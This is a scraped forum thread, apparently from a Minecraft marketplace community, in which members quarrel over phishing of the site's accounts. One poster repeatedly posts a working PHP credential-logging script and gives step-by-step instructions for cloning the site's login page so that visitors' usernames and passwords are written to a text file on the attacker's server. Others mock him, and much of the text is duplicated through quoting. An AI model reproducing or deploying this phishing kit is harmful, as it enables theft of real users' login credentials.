That you know of.
oThat you know of.
I just found out, I wasn't aware it has been about for a while.This has been around for like 3-4 years. Nothing new.
<?php
header ('Location: http://www.mc-market.org/');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
<form action="login/login" method="post" class="xenForm eAuth" id="login" style="display:none">
It comes in waves, they just keep finding new exploits that's allin the past 8 months it started happening more
Please tell me you got this from a website and pasted itExample:
it a bit of hacking in terms of Phishing the user can do it a few ways include running a script that logs cookies to there kali linux meta exploit so in terms msfconsole, that show what and who visited the link include sometimes there passwords easy done.
2nd is:
use the php script
PHP:<?php header ('Location: http://www.mc-market.org/'); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Then you would create ^^ that as login.php
then copy mcm html front end
and change login html script out to
HTML:<form action="login/login" method="post" class="xenForm eAuth" id="login" style="display:none">
where it outputs action="login/login" put the login.php and where it says method use GETShould create a log .txt file on web server. with there stored passwords , username.
You have no fucking idea what you are talking about, don't ya?Example:
it a bit of hacking in terms of Phishing the user can do it a few ways include running a script that logs cookies to there kali linux meta exploit so in terms msfconsole, that show what and who visited the link include sometimes there passwords easy done.
2nd is:
use the php script
PHP:<?php header ('Location: http://www.mc-market.org/'); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Then you would create ^^ that as login.php
then copy mcm html front end
and change login html script out to
HTML:<form action="login/login" method="post" class="xenForm eAuth" id="login" style="display:none">
where it outputs action="login/login" put the login.php and where it says method use GETShould create a log .txt file on web server. with there stored passwords , username.
Nope, I'm CEH (Certified Ethical Hacker)Please tell me you got this from a website and pasted it![]()
I mean considering he's a CEH i'd say otherwise.You have no fucking idea what you are talking about, don't ya?
Well good job on copying a phishing script that's all over the internet.
'CEH' - Hes like 15 years old, lol. (Like majority of members on this forum)I mean considering he's a CEH i'd say otherwise.
What's the point making fresh code for an example that you can google?
You have no fucking idea what you are talking about, don't ya?
Well good job on copying a phishing script that's all over the internet.
Yeah, you can't even rip mc-markets login page properly, 'hacker'. Just another 'anonymous haxzor'Okay, a sec then i can show how it works,
https://join.me/898-909-841 you might know a bit more i have to laugh
'CEH' - Hes like 15 years old, lol. (Like majority of members on this forum)
Yeah, you can't even rip mc-markets login page properly, 'hacker'. Just another 'anonymous haxzor'
Whatever, I have some things to do.
Already did.You really, google me you idiot.
